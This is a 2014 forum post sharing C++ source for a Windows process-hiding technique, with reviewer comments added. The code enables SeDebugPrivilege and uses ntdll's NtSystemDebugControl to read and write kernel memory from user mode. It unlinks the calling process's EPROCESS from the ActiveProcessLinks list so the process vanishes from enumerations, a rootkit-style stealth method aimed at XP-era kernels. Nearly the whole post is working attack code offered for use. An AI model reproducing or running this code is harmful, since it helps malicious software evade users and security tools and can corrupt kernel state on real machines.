JMC31337 Posted January 1, 2014 Posted January 1, 2014 (edited) in no way is this my code at all:simply added/modify 2 lines to make it work correctly for Dev-C++ 1) LONG (NTAPI *NtSystemDebugControl)(int,void*,DWORD,void*,DWORD,DWORD*);2) *(DWORD*)&NtSystemDebugControl =(DWORD)GetProcAddress(LoadLibrary("ntdll"),"NtSystemDebugControl");
// Old forum proof-of-concept: makes the calling process disappear from
// enumerations that walk the kernel's EPROCESS.ActiveProcessLinks list, by
// reading and writing kernel memory from user mode through
// ntdll!NtSystemDebugControl (DebugSysReadVirtual / DebugSysWriteVirtual).
// Everything below is tied to a 32-bit x86, XP-era kernel layout: a hard-coded
// KPCR address and hard-coded structure offsets. The post only claims it works
// on XP SP3; on any other layout the writes land on the wrong kernel bytes.
// NOTE(review): the DebugSys* read/write control codes were restricted in later
// Windows releases, so on a modern system this is expected to fail at the first
// NtSystemDebugControl call rather than reach a write — confirm for the target build.
#define WIN32_LEAN_AND_MEAN
#include <windows.h>
#include <stdio.h>
#include <shlwapi.h>
#include <iostream>
using namespace std;

typedef LONG NTSTATUS;
#define STATUS_SUCCESS ((NTSTATUS)0x00000000L)

//ivanlef0u's code
//xp sp2 ntoskrnl 5.1.2600; the numbers give the size of the struct to pass as argument
typedef enum _DEBUG_CONTROL_CODE {
	DebugSysGetTraceInformation=1,
	DebugSysSetInternalBreakpoint, //0x38
	DebugSysSetSpecialCall, //0x4
	DebugSysClerSpecialCalls, //no args kill all special calls
	DebugSysQuerySpecialCalls,
	DebugSysBreakpointWithStatus,
	DebugSysGetVersion, //0x28
	//from the ReactOS sources (ntexapi.h) written by our favourite Alex Ionescu
	DebugSysReadVirtual = 8, //0x10
	DebugSysWriteVirtual = 9,
	DebugSysReadPhysical = 10,
	DebugSysWritePhysical = 11,
	DebugSysReadControlSpace=12, //0x18
	DebugSysWriteControlSpace, //0x18
	DebugSysReadIoSpace, //0x20
	DebugSysSysWriteIoSpace, //0x20
	DebugSysReadMsr, //0x10
	DebugSysWriteMsr, //0x10
	DebugSysReadBusData, //0x18
	DebugSysWriteBusData, //0x18
	DebugSysCheckLowMemory,
} DEBUG_CONTROL_CODE;

// Argument block for DebugSysReadVirtual / DebugSysWriteVirtual:
// Address = kernel virtual address, Buffer = user buffer, Request = byte count.
typedef struct _SYSDBG_VIRTUAL {
	PVOID Address;
	PVOID Buffer;
	ULONG Request;
} SYSDBG_VIRTUAL, *PSYSDBG_VIRTUAL;

// Declared but never called anywhere in this file.
extern "C" __declspec(dllimport) ULONG __stdcall RtlNtStatusToDosError( NTSTATUS Status );

// Hard-coded address of the processor's KPCR on 32-bit XP-era kernels
// (misleadingly named like the pointer type, but it is an integer constant).
#define PKPCR 0xffdff000 // <=> fs:[0] in KeLand

//FUNCTIONS:
// Resolved at runtime in HideCurrentProcess; NULL until then.
LONG (NTAPI *NtSystemDebugControl)(int,void*,DWORD,void*,DWORD,DWORD*);

//Check OS and get the right Offset:
// Maps the running OS (GetVersionEx) to the EPROCESS.ActiveProcessLinks offset
// that HideCurrentProcess uses.
//   Offset (out): written only when a known version matches.
//   Returns 1 when a supported version was recognised, 0 otherwise.
// The GetVersionEx return value is not checked, and the final `return 0;`
// after the if/else chain is unreachable.
int CheckOSVersion( int &Offset )
{
	//xWeasel's Code for checking OS's and setting the right Offset
	OSVERSIONINFO osvi;
	ZeroMemory(&osvi, sizeof(OSVERSIONINFO));
	osvi.dwOSVersionInfoSize = sizeof(OSVERSIONINFO);
	GetVersionEx(&osvi);
	if(osvi.dwPlatformId == VER_PLATFORM_WIN32_NT && osvi.dwMajorVersion == 5 && osvi.dwMinorVersion == 1)
	{
		Offset = 0x88; //WinXP
		return 1;
	}
	else if(osvi.dwPlatformId == VER_PLATFORM_WIN32_NT && osvi.dwMajorVersion == 5 && osvi.dwMinorVersion == 0)
	{
		Offset = 0xA0; //Win2000
		return 1;
	}
	else if(osvi.dwPlatformId == VER_PLATFORM_WIN32_NT && osvi.dwMajorVersion == 6 && osvi.dwMinorVersion == 0)
	{
		Offset = 0xA0; //VISTA
		return 1;
	}
	else
	{
		return 0;
	}
	return 0;
}

// Enables one named privilege on the current process token.
//   Privilege: privilege name as accepted by LookupPrivilegeValue.
//   Returns 1 on success, 0 if any step fails.
// Caveats visible in the code: hToken is uninitialised when OpenProcessToken
// fails, yet the `bye` label still calls CloseHandle on it; and a TRUE from
// AdjustTokenPrivileges does not by itself mean the privilege was granted
// (the API reports ERROR_NOT_ALL_ASSIGNED through GetLastError in that case,
// which is not checked here). `Luid` is declared but never used.
ULONG EnablePrivilege(char *Privilege)
{
	HANDLE hToken;
	ULONG Ret=1;
	TOKEN_PRIVILEGES TP;
	LUID Luid;

	if(!OpenProcessToken(GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES, &hToken))
	{
		Ret=0;
		goto bye;
	}

	if(!LookupPrivilegeValue(NULL, Privilege, &TP.Privileges[0].Luid))
	{
		Ret=0;
		goto bye;
	}

	TP.PrivilegeCount=1;
	TP.Privileges[0].Attributes=SE_PRIVILEGE_ENABLED;

	if(!AdjustTokenPrivileges(hToken, false, &TP, NULL, NULL, NULL))
	{
		Ret=0;
		goto bye;
	}

	bye:
	CloseHandle(hToken);
	return Ret;
}

// Unlinks the current process's EPROCESS from the kernel's ActiveProcessLinks
// doubly-linked list by patching the neighbouring entries' Flink/Blink through
// NtSystemDebugControl. Requires SeDebugPrivilege (i.e. an administrative
// caller) and a kernel that still honours the DebugSys* read/write codes.
//   Offset: EPROCESS.ActiveProcessLinks offset from CheckOSVersion.
//   Returns 1 after both writes succeed, 0 on the first failure.
// Walk performed (all reads are 4-byte, 32-bit pointers):
//   KPCR+0x124 (Prcb.CurrentThread) -> ETHREAD+0x220 (ThreadsProcess)
//   -> EPROCESS; then Blink is read at a hard-coded XP offset and Flink at
//   Offset; finally Prev->Flink := Next and Next->Blink := Prev.
// A failure between the two writes leaves the list half-patched, and any wrong
// offset corrupts the list — presumably a bugcheck on the next list walk.
// NOTE(review): the process keeps running and stays reachable through other
// kernel structures; comparing a list-based process enumeration against an
// independent view is the standard way this kind of unlinking is detected.
int HideCurrentProcess( int Offset )
{
	// 32-bit-only pointer punning; the GetProcAddress result is never checked,
	// so a missing export would be called as a NULL function pointer.
	*(DWORD*)&NtSystemDebugControl =(DWORD)GetProcAddress(LoadLibrary("ntdll"),"NtSystemDebugControl");
	ULONG Status, Addr, PrevEPROCESS, NextEPROCESS;
	SYSDBG_VIRTUAL Mem;

	if(!EnablePrivilege("SeDebugPrivilege"))
	{
		return 0;
	}

	/**************** CURRENT ETHREAD ****************/
	Mem.Address=(PVOID)(PKPCR+0x124); //KPRCB-> +0x004 CurrentThread : Ptr32 _KTHREAD
	Mem.Buffer=&Addr;
	Mem.Request=sizeof(ULONG);
	Status=NtSystemDebugControl(DebugSysReadVirtual, &Mem , sizeof(SYSDBG_VIRTUAL), NULL, 0, NULL);
	if(Status!=STATUS_SUCCESS)
	{
		return 0;
	}

	/**************** CURRENT EPROCESS ****************/
	Mem.Address=(PVOID)(Addr+0x220); //ETHREAD-> +0x220 ThreadsProcess : Ptr32 _EPROCESS
	Mem.Buffer=&Addr;
	Mem.Request=sizeof(ULONG);
	Status=NtSystemDebugControl(DebugSysReadVirtual, &Mem , sizeof(SYSDBG_VIRTUAL), NULL, 0, NULL);
	if(Status!=STATUS_SUCCESS)
	{
		return 0;
	}

	/**************** PREV EPROCESS ****************/
	// Blink of this process's ActiveProcessLinks, read at a hard-coded XP offset.
	Mem.Address=(PVOID)(Addr+0x8C); //EPROCESS-> +0x088 ActiveProcessLinks : _LIST_ENTRY
	Mem.Buffer=&PrevEPROCESS;
	Mem.Request=sizeof(ULONG);
	Status=NtSystemDebugControl(DebugSysReadVirtual, &Mem , sizeof(SYSDBG_VIRTUAL), NULL, 0, NULL);
	if(Status!=STATUS_SUCCESS)
	{
		return 0;
	}

	/**************** NEXT EPROCESS ****************/
	// Flink of this process's ActiveProcessLinks, read at the caller-supplied Offset.
	Mem.Address=(PVOID)(Addr+Offset); //EPROCESS-> +0x088 ActiveProcessLinks : _LIST_ENTRY
	Mem.Buffer=&NextEPROCESS;
	Mem.Request=sizeof(ULONG);
	Status=NtSystemDebugControl(DebugSysReadVirtual, &Mem , sizeof(SYSDBG_VIRTUAL), NULL, 0, NULL);
	if(Status!=STATUS_SUCCESS)
	{
		return 0;
	}

	/**************** PREV EPROCESS TO NEXT EPROCESS ****************/
	// First kernel write: the previous entry's Flink now skips this process.
	Mem.Address=(PVOID)(PrevEPROCESS); //EPROCESS-> +0x088 ActiveProcessLinks : _LIST_ENTRY
	Mem.Buffer=&NextEPROCESS;
	Mem.Request=sizeof(ULONG);
	Status=NtSystemDebugControl(DebugSysWriteVirtual, &Mem , sizeof(SYSDBG_VIRTUAL), NULL, 0, NULL);
	if(Status!=STATUS_SUCCESS)
	{
		return 0;
	}

	/**************** NEXT EPROCESS TO PREV EPROCESS ****************/
	// Second kernel write: the next entry's Blink (+4 = LIST_ENTRY.Blink on
	// 32-bit) now points back past this process.
	Mem.Address=(PVOID)(NextEPROCESS+0x4); //EPROCESS-> +0x088 ActiveProcessLinks : _LIST_ENTRY
	Mem.Buffer=&PrevEPROCESS;
	Mem.Request=sizeof(ULONG);
	Status=NtSystemDebugControl(DebugSysWriteVirtual, &Mem , sizeof(SYSDBG_VIRTUAL), NULL, 0, NULL);
	if(Status!=STATUS_SUCCESS)
	{
		return 0;
	}

	return 1; //SUCCESS: the process is unlinked
}

//MAIN FUNCTION
// Entry point: two debugging MessageBox calls bracket the call to
// HideCurrentProcess. Its return value is ignored, so the second box is shown
// whether or not the unlinking succeeded. hInstance/hPrevInstance/lpCmdLine/
// nCmdShow are unused.
int WINAPI WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine, int nCmdShow)
{
	MessageBox(NULL,"Starting Main Function","Welcome",MB_OK);//DEBUG
	int Offset;
	if ( CheckOSVersion(Offset) == 1)
	{
		HideCurrentProcess(Offset);//OK to hide
		MessageBox(NULL,"Check if I'm hidden now!! Press OK to exit","FOUND!",MB_OK); //DEBUG
	}
	return 0;
}
the original idea was by a bad @ss hacker ivanlef0u http://www.ivanlef0u.tuxfamily.org/ --Currently works under SP3 Edited January 1, 2014 by JMC31337 2